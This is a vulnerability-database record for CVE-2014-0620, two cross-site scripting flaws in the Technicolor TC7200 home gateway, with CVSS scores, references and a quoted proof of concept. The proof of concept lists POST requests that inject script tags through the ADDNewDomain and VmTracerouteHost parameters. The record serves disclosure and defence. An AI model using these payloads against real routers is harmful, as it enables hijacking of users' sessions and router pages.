VAR-201401-0350
Vulnerability from variot - Updated: 2023-12-18 12:30Multiple cross-site scripting (XSS) vulnerabilities in Technicolor (formerly Thomson) TC7200 STD6.01.12 allow remote attackers to inject arbitrary web script or HTML via the (1) ADDNewDomain parameter to parental/website-filters.asp or (2) VmTracerouteHost parameter to goform/status/diagnostics-route. (1) parental/website-filters.asp of ADDNewDomain Parameters (2) goform/status/diagnostics-route of VmTracerouteHost Parameters. The Technicolor TC7200 is a next-generation wireless home gateway device. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Technicolor TC7200 STD6.01.12 is vulnerable. Technicolor (formerly known as Thomson, Thomson) TC7200 is a modem and router product of the French Technicolor Group. The vulnerability comes from the parental/website-filters.asp script not correctly filtering the 'ADDNewDomain' parameter and the goform/status/diagnostics-route script not correctly filtering the 'VmTracerouteHost' parameter. # Exploit Title: Technicolor TC7200 - Multiple XSS Vulnerabilities
Google Dork: N/A
Date: 02-01-2013
Exploit Author: Jeroen - IT Nerdbox
Vendor Homepage:
http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew ays/cable-modems-gateways/tc7200-tc7300
Software Link: N/A
Version: STD6.01.12
Tested on: N/A
CVE : CVE-2014-0620
Proof of Concept:
Persistent Cross Site Scripting:
POST : http:///parental/website-filters.asp
Parameters:
WebFilteringTable 0
WebFilteringChangePolicies 0
WebFiltersADDKeywords
WebFilteringdomainMode 0
ADDNewDomain alert('IT Nerdbox');
WebFiltersKeywordButton 0
WebFiltersDomainButton 1
WebPolicyName
WebFiltersRemove 0
WebFiltersADD 0
WebFiltersReset 0
Reflected Cross Site Scripting
POST : http:////goform/status/diagnostics-route
Parameters:
VmTracerouteHost ">alert('IT Nerdbox');
VmMaxTTL 30
VmTrIsInProgress 0
VmTrUtilityCommand 1
Check out the video at: http://www.nerdbox.it/technicolor-tc7200-xss-vulnerabilities/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201401-0350",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "tc7200",
"scope": "eq",
"trust": 2.4,
"vendor": "technicolor",
"version": "std6.01.12"
},
{
"model": "tc7200",
"scope": "eq",
"trust": 1.0,
"vendor": "technicolor",
"version": null
},
{
"model": "tc7200",
"scope": null,
"trust": 0.6,
"vendor": "technicolor",
"version": null
},
{
"model": "tc7200 std6.01.12",
"scope": null,
"trust": 0.3,
"vendor": "technicolor",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00092"
},
{
"db": "BID",
"id": "64672"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001005"
},
{
"db": "NVD",
"id": "CVE-2014-0620"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-101"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:technicolor:tc7200_firmware:std6.01.12:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:technicolor:tc7200:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-0620"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jeroen",
"sources": [
{
"db": "BID",
"id": "64672"
},
{
"db": "PACKETSTORM",
"id": "124648"
}
],
"trust": 0.4
},
"cve": "CVE-2014-0620",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2014-0620",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2014-00092",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-68113",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-0620",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2014-00092",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201401-101",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-68113",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00092"
},
{
"db": "VULHUB",
"id": "VHN-68113"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001005"
},
{
"db": "NVD",
"id": "CVE-2014-0620"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-101"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in Technicolor (formerly Thomson) TC7200 STD6.01.12 allow remote attackers to inject arbitrary web script or HTML via the (1) ADDNewDomain parameter to parental/website-filters.asp or (2) VmTracerouteHost parameter to goform/status/diagnostics-route. (1) parental/website-filters.asp of ADDNewDomain Parameters (2) goform/status/diagnostics-route of VmTracerouteHost Parameters. The Technicolor TC7200 is a next-generation wireless home gateway device. \nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. \nTechnicolor TC7200 STD6.01.12 is vulnerable. Technicolor (formerly known as Thomson, Thomson) TC7200 is a modem and router product of the French Technicolor Group. The vulnerability comes from the parental/website-filters.asp script not correctly filtering the \u0027ADDNewDomain\u0027 parameter and the goform/status/diagnostics-route script not correctly filtering the \u0027VmTracerouteHost\u0027 parameter. # Exploit Title: Technicolor TC7200 - Multiple XSS Vulnerabilities\n# Google Dork: N/A\n# Date: 02-01-2013\n# Exploit Author: Jeroen - IT Nerdbox\n# Vendor Homepage:\nhttp://www.technicolor.com/en/solutions-services/connected-home/modems-gatew\nays/cable-modems-gateways/tc7200-tc7300\n# Software Link: N/A\n# Version: STD6.01.12\n# Tested on: N/A\n# CVE : CVE-2014-0620\n#\n# Proof of Concept:\n#\n#\n## Persistent Cross Site Scripting:\n# \n# POST : http://\u003cip\u003e/parental/website-filters.asp\n# Parameters:\n# \n# WebFilteringTable 0\n# WebFilteringChangePolicies 0\n# WebFiltersADDKeywords \n# WebFilteringdomainMode 0\n# ADDNewDomain \u003cscript\u003ealert(\u0027IT Nerdbox\u0027);\u003c/script\u003e\n# WebFiltersKeywordButton 0\n# WebFiltersDomainButton 1\n# WebPolicyName \n# WebFiltersRemove 0\n# WebFiltersADD 0\n# WebFiltersReset 0\n#\n#\n## Reflected Cross Site Scripting\n#\n# POST : http://\u003cip\u003e//goform/status/diagnostics-route\n# Parameters:\n#\n# VmTracerouteHost \"\u003e\u003cscript\u003ealert(\u0027IT Nerdbox\u0027);\u003c/script\u003e\n# VmMaxTTL 30\n# VmTrIsInProgress 0\n# VmTrUtilityCommand 1\n#\n# Check out the video at: http://www.nerdbox.it/technicolor-tc7200-xss-vulnerabilities/\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-0620"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001005"
},
{
"db": "CNVD",
"id": "CNVD-2014-00092"
},
{
"db": "BID",
"id": "64672"
},
{
"db": "VULHUB",
"id": "VHN-68113"
},
{
"db": "PACKETSTORM",
"id": "124648"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-68113",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-68113"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-0620",
"trust": 3.5
},
{
"db": "EXPLOIT-DB",
"id": "30668",
"trust": 2.3
},
{
"db": "BID",
"id": "64672",
"trust": 2.0
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001005",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201401-101",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-00092",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "124648",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-84043",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-68113",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00092"
},
{
"db": "VULHUB",
"id": "VHN-68113"
},
{
"db": "BID",
"id": "64672"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001005"
},
{
"db": "PACKETSTORM",
"id": "124648"
},
{
"db": "NVD",
"id": "CVE-2014-0620"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-101"
}
]
},
"id": "VAR-201401-0350",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00092"
},
{
"db": "VULHUB",
"id": "VHN-68113"
}
],
"trust": 1.3071428699999998
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00092"
}
]
},
"last_update_date": "2023-12-18T12:30:48.399000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "TC7200 - TC7300 Cable Gateway - Technicolor",
"trust": 0.8,
"url": "http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways/cable-modems-gateways/tc7200-tc7300"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001005"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-68113"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001005"
},
{
"db": "NVD",
"id": "CVE-2014-0620"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/30668"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/64672"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0620"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0620"
},
{
"trust": 0.6,
"url": "http://www.exploit-db.com/exploits/30668/"
},
{
"trust": 0.4,
"url": "http://www.nerdbox.it/technicolor-tc7200-xss-vulnerabilities/"
},
{
"trust": 0.3,
"url": "http://www.technicolorbroadbandpartner.com/"
},
{
"trust": 0.1,
"url": "http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-0620"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e//goform/status/diagnostics-route"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e/parental/website-filters.asp"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00092"
},
{
"db": "VULHUB",
"id": "VHN-68113"
},
{
"db": "BID",
"id": "64672"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001005"
},
{
"db": "PACKETSTORM",
"id": "124648"
},
{
"db": "NVD",
"id": "CVE-2014-0620"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-101"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-00092"
},
{
"db": "VULHUB",
"id": "VHN-68113"
},
{
"db": "BID",
"id": "64672"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001005"
},
{
"db": "PACKETSTORM",
"id": "124648"
},
{
"db": "NVD",
"id": "CVE-2014-0620"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-101"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00092"
},
{
"date": "2014-01-08T00:00:00",
"db": "VULHUB",
"id": "VHN-68113"
},
{
"date": "2014-01-02T00:00:00",
"db": "BID",
"id": "64672"
},
{
"date": "2014-01-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001005"
},
{
"date": "2014-01-02T14:04:44",
"db": "PACKETSTORM",
"id": "124648"
},
{
"date": "2014-01-08T15:30:02.683000",
"db": "NVD",
"id": "CVE-2014-0620"
},
{
"date": "2014-01-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-101"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00092"
},
{
"date": "2015-07-24T00:00:00",
"db": "VULHUB",
"id": "VHN-68113"
},
{
"date": "2014-01-02T00:00:00",
"db": "BID",
"id": "64672"
},
{
"date": "2014-01-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001005"
},
{
"date": "2015-07-24T18:38:39.217000",
"db": "NVD",
"id": "CVE-2014-0620"
},
{
"date": "2014-01-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-101"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201401-101"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Technicolor TC7200 Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001005"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "124648"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-101"
}
],
"trust": 0.7
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.